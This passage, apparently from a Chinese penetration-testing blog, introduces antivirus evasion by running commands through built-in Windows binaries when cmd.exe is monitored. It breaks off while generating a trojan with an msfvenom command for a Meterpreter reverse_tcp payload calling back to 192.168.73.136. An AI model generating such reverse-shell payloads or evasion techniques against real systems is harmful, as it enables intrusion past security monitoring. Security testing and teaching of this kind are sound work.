“在渗透测试中,常常会遇到这种情况,上传一个shell上去,连上,却发现无法调用cmd.exe无法执行系统命令,这时候你往往想着,上传一个自己的cmd.exe上去,这是一套行云流水的操作,但把环境条件在变得苛刻一点,杀毒软件将监视二进制文件,例如cmd.exe,那么你会怎么做才能逃避检测?那么接下来就会介绍一些免杀思路。”
01
背景
Windows系统提供了多个二进制文件,可以使用它们执行任意命令。
在这,你是不是想到了什么?既然可以执行命令,那么它将帮助hacker们逃过检测,尤其是对cmd.exe监视的环境下。
当然这需要一些前提条件:未正确配置白名单规则(这里涵盖了文件名和路径),使得一些系统可执行文件能够执行。
接下来
让我们看看这些项免杀技术的闪光点!
![df2df1b8c7fc686d73e1d660251d9e64.png](https://i-blog.csdnimg.cn/blog_migrate/20af5fe47f6ed38fc7c8927190c49b6e.png)
02
正文
我们先用msfvenom生成一个木马程序:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.73.136 lport=